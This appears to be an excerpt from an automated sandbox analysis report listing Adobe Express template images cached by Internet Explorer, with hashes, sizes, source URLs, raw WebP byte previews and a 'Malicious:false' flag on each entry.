                                                                                                                                                                                                                                                        Preview: RIFF.$..WEBPVP8 .#.......*,...>u4.H....#t....cn.........&._......m....+.....x.tW._...?@.....B............|.....#.....O.......}.<.=..............b...e......].....Op.......~W..........w.7...?.=....W.+.?...]..W.o@_]>..c.g.7........?.?....".w......|O...../.../......~..1.M.{.....?.....-.........?................ ...b..Y....o/.*.:...8.)hS..;.R..yP.WJ$.[.8..N$Q.M>..@.7..x+.I.{...7..c.`Q..(...*.........4&.w{.ex_......p.?.._..l...9.W' .........y{".%.Y.`!..d^V...1..-..@.*.G.y.@Y...\l ....~.k...d..dZ.;P...h1.9.P.....R........:y.2t...A.K..O.N..8.+...Q+...S.f..v....9.*..-..q.{Y....v.n..-....X..."p....X.|.B..../....jm.1k...zL......A..?.d....A..*e.c....&q.W...}....Ww..;...E.....R.....XV...4......c..-.....e....f.....~h.. ....L..e..9......^.......}m....Or.K@.._.|B.0..MB.7....n..`..!.......s.V.q.(M?A..g..k.$U1.,.)[..2.nN.K..p.I0v..R...gX..>...(..$D...X.+...5..{8..1.<..<m.x.B.2.kk.k<K.c..F.].t...[..I6.c.}Y..<wg.W#.\.W..Phe.Km.`..!...........j..N8..F
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_181b604b63bec3b8bbee889de292d1daea1530139[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8292
                                                                                                                                                                                                                                                        Entropy (8bit):7.759602489884572
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:bZafxTBUUcjZetRs44bS3rttQH4uFq04sO0:bATBuetRV7ttQRFW0
                                                                                                                                                                                                                                                        MD5:2CF10D42514EF842F3BBF35508623D23
                                                                                                                                                                                                                                                        SHA1:831045C456D1606D73318BFFB9DF178CE6EC308D
                                                                                                                                                                                                                                                        SHA-256:572A525434EDE642C011CEF6EADDBCD485FA8EFEB2D323E0BA1CE14C86CA6BF9
                                                                                                                                                                                                                                                        SHA-512:D70E9F2A36F59B46F1623EC79E5CDA5C4947AF9394EA97D858E64C08F72F5F4EC12B4AC5F9BFA0349EAD6E9C405DE4EEA8F1C79BB6555969B8DC8118C69D4FC0
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/create/media_181b604b63bec3b8bbee889de292d1daea1530139.jpeg?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF\ ..WEBPVP8 P ...V...*....>u:.J$."....@...in....#..~.....1..M?...s.y.o.S..C..d..z_>O.u...........{B;.....h..pE.+....Y?......3.`.....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p....8p..f...aB...(P.B...(P.B...(P.4xj..?...............$2.6+..^.z...^.z...^.z...7.....L.C.9.O..b..s.Y.. ...^..l.,!G..d.W{*..........f{8....W,..|..b.}5.^.z...^.z...^.z...S..9h......c.."8......]2(.y....TE..+..,..KDY4../+6t...k|.\L.5.....f.6l.f
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1968c8f3dd906c601b557aba0c66fbd643d723203[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16001
                                                                                                                                                                                                                                                        Entropy (8bit):7.9260475506105
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:51VbjiuxiUz/LEVJjcOuz3Dt1HVCPlmgns+pBXqC:5/XiuAUzQVJYrATvlF
                                                                                                                                                                                                                                                        MD5:E10BCDBAE85362CF7AB1FBA39B7C8C4D
                                                                                                                                                                                                                                                        SHA1:649FCB45F298A86B1D9BCF927F221F6D52274DA7
                                                                                                                                                                                                                                                        SHA-256:491CDDBBCAC63FFEFD69CF89C3BEB1F55A2D0DC673571111984649F8C86D0CE7
                                                                                                                                                                                                                                                        SHA-512:D65E674FA832259D9BA8493AD105258AEA7D22D3F7FB5E0DD3546720D7312593777225038C191EFB018AE13A4F504792FA2F19781098322238DDF95DC84E5095
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF.B..WEBPVP8 .B..p....*....>u:.J$....qh....in.N.?+B5,<....y...`..+..t.................W.......}..`....yx{H.|...w.i..?.?.=.............................y....Q..............a.M.......o....S.....W...w.{..2.......W.?.....~S.....?......?.....{...........P.v/3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3.._;.%..0...a3d...~...6..#K..O.!y.C...T...}..ng.u~.\d2.8K2C...7..3...`.v/3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>..3...s>...]...G.p.@-.._..k.....G...lB+..Q...id..(.?..3.6b...}..ng...}..ng...}..nJy..gs..0..;.j.|.... .}...X.+......s..E.8i.qm../3...s>..3...s>..3....uj.M-5...l....).d$HJ&...q...P...na.lT..L....s>..3...s>..3...s>....-.8.6l..j, .....
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1a5f64a3bc2be800f6f8ab67daf17e7f0e7ce636d[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):10326
                                                                                                                                                                                                                                                        Entropy (8bit):7.979768487789043
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:WudZ13f5gjPOAMqTVMEcSAj3OvSqFevcKBELffafEENA/vVOFc:xdZ1P52MNEcFrSe5CbfgS9OFc
                                                                                                                                                                                                                                                        MD5:7B3EE46514F25D79F816B2F2A0E2D6B2
                                                                                                                                                                                                                                                        SHA1:C452D57F2864FC6E88C3B8F7B191CF1B92E73F1F
                                                                                                                                                                                                                                                        SHA-256:5BBD58CAE1FCF68200DF325AC9BA0130B338E17C975873207CFD85618889600A
                                                                                                                                                                                                                                                        SHA-512:879ADAB31768F24393B75C7BF9F4956B8909FE5F93B141CB058ED95FB9FD70301D478B819726494A85BEA0CBD2A4994EBC106153D8F6EC01346A4122448DA852
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1a5f64a3bc2be800f6f8ab67daf17e7f0e7ce636d.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFN(..WEBPVP8 B(......*..k.>u8.H$..!$.L ...cn.[....M..zS.O;.Y...=.K...y......_......Q....~......e..........~.............k.......g.7.O.O...?r.............../...i.I...zm..VA.3.o1..gs.....~;}.............}...g=.?.y........=........S.....=...y....=....j......`WH!..z@I..M......m...T..!....uH.-.m..a...9O.B..!<.....~>...p....s.y..62......g..=+g.m...A...67.?D:...;9t0.Hz....lp... ..`r.0?eD.#....q....~...3...c.....lJ$...S..%z2...;2.)W..]p.W.>.*.]....,*+.......t..;.y..{....p(J...G.....k.~Z.c.....fi.V......G..d.,.e=..iE..N^`.].1.....J.80K.F..p.{.T....H?..^#....o..}NYMK.4....@.6..Kc.y..Ps..\!.^..d.t..c........c.II.....p5..t0...~..W..t.i...(..$...l..b."0..b....S.yh...&.B.J..$..G.ej.3....E..p.?.!........}..7.a...,G...K.\.......c...B...5.$.j.4-..v'.[...i.n....y-"i..V..;....q...[....n.8.|...2..T..&.r..U.SM....kgg..w!.....Z.l.7Yy./..X..2.OC...0.-{T..b...%.I.~...rK..l.;......``.4[.h+......h..pr.oVQ.vL...&/....^y... .6.!I....h..w{>.n!...=G...cK.[...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1a92e0ac878c2fd223de53d35d857869c15554031[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8590
                                                                                                                                                                                                                                                        Entropy (8bit):7.977187421262688
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:wgqvM1TzqVApm676PjHkqGv3hnmYv67lLbMTi5SOIB9WCd:wtcTznmk+am26hvei5JI3
                                                                                                                                                                                                                                                        MD5:FB859E52DD20BA87612747105AC952B0
                                                                                                                                                                                                                                                        SHA1:AD06A39BEE6B13DACDF62CE5A3FA6C4AFFBF0C89
                                                                                                                                                                                                                                                        SHA-256:71A1DAE9A84B243FE87BF0AEA3CE75154273B5579755475FD09253E650F705A8
                                                                                                                                                                                                                                                        SHA-512:9BB340A124CC088A5527C448D634D62D36DA8C56DA72D0786641C7CDD52E6A48E9193F8B763F4F31C06992C6C45DAF6A1A3290BD21C21CDE877D54296F591555
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1a92e0ac878c2fd223de53d35d857869c15554031.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.!..WEBPVP8 z!..P}...*..k.>u8.H.."!#.....in.:...P..H......A....vYO.'Q...o...?............_.<..&k^`..}.K..Q.;...3.....O9.....9.E..............#.e....._..s~..........?.o.....?.......;.)o....L0a*.......S...../.|.i....3p!&..<.xS.n.3...C.C._m......(..y..M.g}.l......rz.iM.D...Cf......O..l.1@./.,.^A.......f...S5H..l.`z.^ o.....k...).M.~.]wR.+;...t...u...8..wk..lu..$.l..........X.....A:..q..[1..^@z.....)!:..J.7.=...x..?b.......n3@.3gn.C.42:.....?..........o ........`S?.t.b..Hm.Xtw.T?@S....~..,V..).......1.....8M......:........$...m..s.5.z..aeD.U.f.[..q....,.]....o{...[E~..i.....}.-...M6wM..?O...kYtS.[..:....pK..c.MU.0.)V"..T..J...X.Ge......Z5[..-.8..A./y.~...T/O.5./_.}........X.o.. .C....;....H..I...\..e....M.f..|..>.YX..K .b..#7..$.D..R.@...u.....E..t.5....VF.s.#U.i.k.[6...Yn.KM.By.J....l....&.0....;......QM...|]..=k_..l....gvP.Q......n.....KB....W.S...i.".....I.}..U......D".2..VZ.l...7....Z ...$..1=....~..(..%..9u..c.].....4...l.t....tb.-S
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1add7401488fed12c28150125da85e141e2081d96[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):7262
                                                                                                                                                                                                                                                        Entropy (8bit):7.972800657105986
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:gZZJ9S+eUWHuU0Rqk9q4+zzMFIxKWOGjj2v7n+AaCVP4CrbrmzY4fO5NALOTHxYY:gZZJxWZ0RDq4+zzRxk2jcj5axeaEazQ
                                                                                                                                                                                                                                                        MD5:13AB0F1839F68C406E8F6F9CF3C359B0
                                                                                                                                                                                                                                                        SHA1:0931E45F5C57946B5948A750E4F50229E3C3DF70
                                                                                                                                                                                                                                                        SHA-256:8FDAA9139DFC94373125757FF37216A14866FDE9F86AC4C4491CE5F50240E663
                                                                                                                                                                                                                                                        SHA-512:E412AD3AFC5EDE4EEBAB8FE0A2C9AAD0F57EFB190EDE428D289E5ED2A02393C2506C8C94654DD9FA265DEE5D60E472886E0FFCFD6F080F24E279BCD220F67A24
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1add7401488fed12c28150125da85e141e2081d96.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFFV...WEBPVP8 J...pr...*..k.>u4.I$..!#P.x...in.r..>r........g.o...~y.9......?{;d..K>q..._.<..{...?........O..C.q'...}w..x..?............~.?..Q.g.g...O..y...g....O.?....+.........W.......?..m.........7.o..r...8.X.9c....8.X.9b..........:...B..2.T...U#U..<.^..)_.I.K~q.RR..'h..........h.#.6|.f .]IQ_..lpRFL...N._........8.X.9X...=..e......j.......y...d.%.b....._..G..C..v6R.q..}...`...........G.=6<.."..`.H.&..CX..0.Bw1....#......|..?..L$..p.8.Kv..l.KN...x..v..]..nK..........,.{u....=.[...e[..^.........._......J..Y...v\@v...=R..e..PhJ-.u.....V.+i..k.....Yb#.....{b.u@...^X1.....C.'...[.y.p......e"..Y........@......\%0.+ 2...f....{..YY...`7.......o+P.j.E|w.`.$...~.......t....... ..b..1.S......x.z.....T."....G......%...L..y[[....M(.Bl.._..af:j.8a.>.<_...C.N....&...,t.6.8Yc&.UF#.6....^.(..p,e.!...@..d....8....s.8..N32../............9@9Sq.b.{7...).r<.Za..?.?.u..q.|.o..O..x..[w.....q...Y.T........"z.V..[Z`...p..#...Fy.7.....n......qE.<.cPh...P.[@..7.%.3b..\..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1b1edc2eb0698cdb9a2fe1b8b32e420743c6137b4[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):9458
                                                                                                                                                                                                                                                        Entropy (8bit):7.978909076804826
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:+7op9Mt9JgeFZOnME8DM+mJ80pOWvM5t+xrMfmPi4gzKkVfpR8F/7/SB:gJT38ME8HSO8Mj+xru4gOQwF/7/SB
                                                                                                                                                                                                                                                        MD5:B1FDC53A3202237C8FD7FC9122BEBDDC
                                                                                                                                                                                                                                                        SHA1:7A534922F4B6333901AAB35F50138B7F8ADA2E63
                                                                                                                                                                                                                                                        SHA-256:09F6B16C71FC41F43FBD74117093D0009954793DD0126AE23A0F044311050393
                                                                                                                                                                                                                                                        SHA-512:6B796E0C658A31760357F767AB128B2FE35E20D9F74ACC84AE8E5193735BC2DEC34BBB11B09AB782611F9022D21068C45B7E7D911B2762553ECE90603BFAFE5B
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1b1edc2eb0698cdb9a2fe1b8b32e420743c6137b4.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.$..WEBPVP8 .$.......*..k.>u6.H....%3.....gn..X0]f[....y..Iz/#..........k....L..^a...%.v..;..._.e.Q..%.....v....s....s...N0.G.....?v.g........M..._.|.v.n~a..}.........................g...?........[......w...o|..e.o.!.........p[&...9..]...".E+.k<."k.y.4.3Q.c.]/.[o+S.K.J7.&...TW.[.,...dI..._.P..E;l...a....d.@Q.Z..........v.@......).R........7t....6bb.k.qmgL.g6..;.&.L......Cs..z..ky:9.._.kpT.m......Ch..P.s.t.2|]..4.........&.EZ.%.-Z.|.X..`..j.a.....l.kC.....|..o...o......u..R......(.s..V)..".UGP.n.y{..k.............Y/...nUW.:]..o..1.$..\..-I.....i.d..0.....Mm.{...X4z...5...?...B....R..J..c].d...N.5.....nB....4..B;$....8....0.$u.L.@f.Q@.w......)h~....8.....[#.QR..8o]..De........5";e._....8~UBK;..b......I.....N.v..X..aw:Y..g;..!.#..b.~.1l.[0...7F..|g.3Z.9..n..c..w..b.~QG7..WnW.VbH.Se..f.@3.s.. .F.Hx*w..[....:..S>......_......:.$s..8l.."2.i...r.....^...4....WC..z2.)....(.-..o.....~..P.....7adP#!E,..8J..*.G.....q...c..3..._.g.:D`!......p..aB
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1b38db73b9263e2bd685fe11c2242ed6136b19817[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):11232
                                                                                                                                                                                                                                                        Entropy (8bit):7.9809493536686995
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:0Rjfxiqd8zigVwNdFhE2a+8OHmuVc9LEh3Lq3VOWXRkUTXPu3IPQT:Kx1d8z+NdFhy+YutL6VPR5r8IYT
                                                                                                                                                                                                                                                        MD5:B4CCC992BE09F3781CE87A97920167DC
                                                                                                                                                                                                                                                        SHA1:4F5DAC1464B845C8C0197B1D93AA4C4A8215529C
                                                                                                                                                                                                                                                        SHA-256:2BFAFA74566D2A0E3B241A192EDD587F8A50F3099FBAA00F96FF4E9481A01E65
                                                                                                                                                                                                                                                        SHA-512:5CCA322A9A99620D360C6235707A106A431A0E132701065F6D877E2BF0DB60AE7B47EA31A9A83920A179CA8A42F2CBE4FBD0C3194707FB82240AEC0B5BF4CCFA
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1b38db73b9263e2bd685fe11c2242ed6136b19817.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF.+..WEBPVP8 .+.......*,...>u4.H...!$R.....gn.SX.H..e7..?.......9.N_.c=Jw.......o...?...<.._...~O.j.+.=......O.?.=..A.o._..............v...G{Oe&........A.?..........p.7...w...W...?..?.~P.y.....?!O..........'.......~.}&...w.g..G......3.w...'...................w.....x.m,....K-,...=..gq.d...;z.L.jK.av...i+.a..r.!.{.V........r.n1...S`.en.... ....|Y....._D..@.....?..O..m..F.=....1j..u..I...A..%..&K....z<..C.{.....t...4.{..~...J..VOz}.C..9...z1....Gw...l4...e..j}...O...{...}aS...q*...|....1&k.i'..7G.e..y...t.Uh..{.F.%&.7..g..v...j.1.*.R\[R-b........3...{2..c...>........Y..8...l$..ha.e.9W...q...$i.Or...+.`.LO;..g0.......U'....^.b.......~..-...W`v..{X".y..D..a.....R..-......".w.;=...2.x....H.3......7........b.......1.o.Q......1.\...:..{`<i.!.zG..m.../.......f......?.e.......#y!.....'Qb..-.O#....~...M$...E:"..Kx..*e..jI..FT.o>.2..f..x.:...._........<wP..}.H).....j...Qp......G9....r.0...)[....R<.j.4....W.R}......AE..8 .m....7N./...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1b5a859a32101bea5202fb9232db232ae8ebcbb19[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):7708
                                                                                                                                                                                                                                                        Entropy (8bit):7.969303696380344
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:192:6FEsF4ILri7VsMTWITrOmdpePFHCPrH+N3TRWeN71XEW:vy4IypxpG4pW2+N33h1UW
                                                                                                                                                                                                                                                        MD5:5314DA4AF60386C0BAE102AE56BE6CA3
                                                                                                                                                                                                                                                        SHA1:284E8205AFBE373C5B90E585667486F070613AB6
                                                                                                                                                                                                                                                        SHA-256:E002905334359B1E2E572B3654287E65E8B4BD8ABC0074000D0BBB67A56606D9
                                                                                                                                                                                                                                                        SHA-512:8A9FAE63C829C10AA4CD8E6DC251A135024BB05488D2472359AF3AF0785F765BC83A39DFCC3333ABAD9AB46E5934BEA8CE4B97C978B6136451056699B8B620AE
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1b5a859a32101bea5202fb9232db232ae8ebcbb19.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 .....y...*,...>u8.I$."!#..P...in.......}s........I.......x......D......?.~........~......o........8t4....|.._...CO...z.......l_`..?........;.....?..q..g...?........H.G.......g......................W...............?.....C....>..z..|t.]..:...`A}9...E.^y~.l.e....qb.L?......f......n..e...L......rx.x.rd.5.._JS.....81..........[....P....S".$I.4.6.6.Dt....L....H0.".+.q.&.O..@C.....9shY.@....!(.q.w.D..9A^W...9~....."..=...e<(l......y.q~./Qh..M...`..T^.m....).$/.,.5...|...M.l}7...a.....V....o.CZ(%Q.)...O..ln...ZD.Q..Z..{.<...2&g...~....X{.n..Kjt.h.dqC.v.w7..x..u..!S.H..x...1v.{i..a.W.Jx.\..._a.M..n.......'D.!....6....eI..o.FZ.N..O.e.R...(5.....}.*..}P;.e.n...L.......Y$....V.x..#..z.b..A....H..j........e.g.....*..(j.La.S..J.!.?..A._%2Y.._........R...3.P_X.8.ie......v......x.....4....KL?......U.u.?..S....!..xlM..H.y.....!.f~~~~~~~e.6.4./.}w.R....!.r...`X....d.PWAj...._...].5.R..K.@M...8.qw..#...O.6t..n..C...<*..m..~........^m^h._...j.@...
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1c67c6f940a8a1dd251dd13a8a3d506453ea12dfd[1].jpeg
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                        Size (bytes):16000
                                                                                                                                                                                                                                                        Entropy (8bit):7.902939693145605
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:384:VUZ5q1EBl7NJ3NlP5DYl7wUaejHyu5Izs3:VPKBRNJ3r5ya2nS2
                                                                                                                                                                                                                                                        MD5:9086C7D7AA0A8089B4E05B08293F6F9D
                                                                                                                                                                                                                                                        SHA1:69F04C536D16043C6F883E97EB76DF5914956333
                                                                                                                                                                                                                                                        SHA-256:B07B2726B3098817BCEC307309EBBF5073E2459794D3D0D1DA4284FED2D351C1
                                                                                                                                                                                                                                                        SHA-512:6D29DB5D95CC631C84998E3D804C81B6B8BBD79E1DF5962E6B790BB756BBBBC11E933B47541B10542DFFE4C54D21DD4A816E49146DD57F0F358B475BA84931F8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        Preview: RIFF.{..WEBPVP8 .z...5...*....>u:.I.."."48...gn...6..[...<1....v..~a.../._....:.._.?L~[~......7......3.........'.'..c..?u=.?S.........c...../xO...?.{......S..............N...o........}........c........o.......=@?......_..k.@.........e..................^......_.~.~........>.~..7........'.....o._........./....z............~......_...=F............................~.|..6...'....._............W.....?....;...C.?..o..p....?..'~.......U.?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.....~O..?'.......`..T.p.g.....~O..?'.....~O..>..z.8.=Z5...';.+.+...%D../.....~O..?'.....~O..?'.....a...z...Z$b.f..3oS..gz...O..%_3~.....-d.w.v? .\&n...z.i.e..W.....~O..?'.....~.+...8.$..
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1d475ea237f3632359c1538d48da93b1deff5ed7e[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):5006
                                                                                                                                                                                                                                                        Entropy (8bit):7.962700355562703
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:fyHCbgDyr0H1IkP+AXLiv7iffZcgBKV7jWgzU9vzVAyFELqaWK:qHCbgWY1JP+OLilVrWOyF7K
                                                                                                                                                                                                                                                        MD5:AB3FE31B4A563F72F1975598178630DF
                                                                                                                                                                                                                                                        SHA1:D7D90BBE9BDFAE5A4721A50828819DCD5959DE41
                                                                                                                                                                                                                                                        SHA-256:C29607EE46628C768510C24E82A215A4998A5D6844E8BA4E8C1BA0F2944A0E2E
                                                                                                                                                                                                                                                        SHA-512:06AF1DBEEE72021B25A24DDE247D8F69B8F9EB4933FDC432FF23CDA0D0BC3BD2938181E0DE4056F511F8C7D88E18609C65D88FBEC5A2FD92C1EEA6C33A079BC7
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1d475ea237f3632359c1538d48da93b1deff5ed7e.png?width=2000&format=webply&optimize=medium
                                                                                                                                                                                                                                                        Preview: RIFF....WEBPVP8 z....j...*..r.>.F.L%..."2..p..in.......Q.R...v..c..7.~...l..6=n..go.`4.751..,.>......fEXQ....z.R...\1..Z7...`P._M..4.Lc}x($bD......,....|.K.M.~M...Y].A.......e.G..{.V.4*.'....../t..r..xS.x^.7N.....zP|S.A~.4.P..s.......T..bV....q.......w....].2.V@..y..RJ..B.^4ZY(....5.'..<.....=..yz.....<l6=..>...6...Wf.^!...(..R4..7..R.r+./..?.o..Y/t.2...V.......pR.^..'........$#Y.......5L..mnK....8.a.v.o..MYj+."bs..{../\.j....6......6.@..D.8......M..(^(...q.A...}"H...S.......J.X..K....Cb..I...a...^....Y,'...*..H..-S..Y.|pFT ..1.=z.[.>.p...[Hz....YI.CG.8g...z...-1.{.!.w.w.O.|.4..M.w...'^K!....fgq..3.<1n.c(....YK.l...N.. .5.......(V./...>..IN.................{..D.j.3.QLe..Q .[.BX.....~t.M...:...$M.....y.\.lK+.U.r..5.2..ez...............c...-<...T.5...+i...X...[4._..o.K..+..=.qd.*......L..q0..q1..P.....O...|..\.D5]r.....a.d``....V...9'^e$d.X],g..3.2.J.i1I.....X...,....GdG.,..V&.'.d._...a7...cS..p(g.W...8......%.\....d.){.....G.....l..VBQ>i09D[.....9
                                                                                                                                                                                                                                                        C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\media_1d5c2fd0e78fcc873737cc81c99fc624ed4df5df3[1].png
                                                                                                                                                                                                                                                        Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                                                                                        File Type:[none]x[none], YUV color, decoders should clamp
                                                                                                                                                                                                                                                        Category:downloaded
                                                                                                                                                                                                                                                        Size (bytes):8092
                                                                                                                                                                                                                                                        Entropy (8bit):7.971369362833851
                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                        SSDEEP:96:xP3Ybd3sTILft5EVhmW4SMkV896oP8nEUYh3Soqer8XdU/zr82LZ8eX1seF4ll9S:x3Ad3sTKKVBV89CnEUYZNHDd8eX+eM5g
                                                                                                                                                                                                                                                        MD5:AC512576151F38EDF8C8D160B01E94F8
                                                                                                                                                                                                                                                        SHA1:8EB19EE5D2B1FB260AC9619EC3591C6D09A2A27B
                                                                                                                                                                                                                                                        SHA-256:E0F5E08400A153C4B8FC664BC9CED6D04FD3C0366E32077D7657A09F9472E042
                                                                                                                                                                                                                                                        SHA-512:E91C9130B5D015685E646779D523B873829B12576F40C4FB2017AC3CE9CB2A2F19BEA9424F41028B41D8C873F9007CEA0147D706C324FBF063B50C2333CA1BE8
                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                        IE Cache URL:https://www.adobe.com/express/discover/templates/media_1d5c2fd0e78fcc873737cc81c99fc624ed4df5df3.png?width=2000&format=webply&optimize=medium
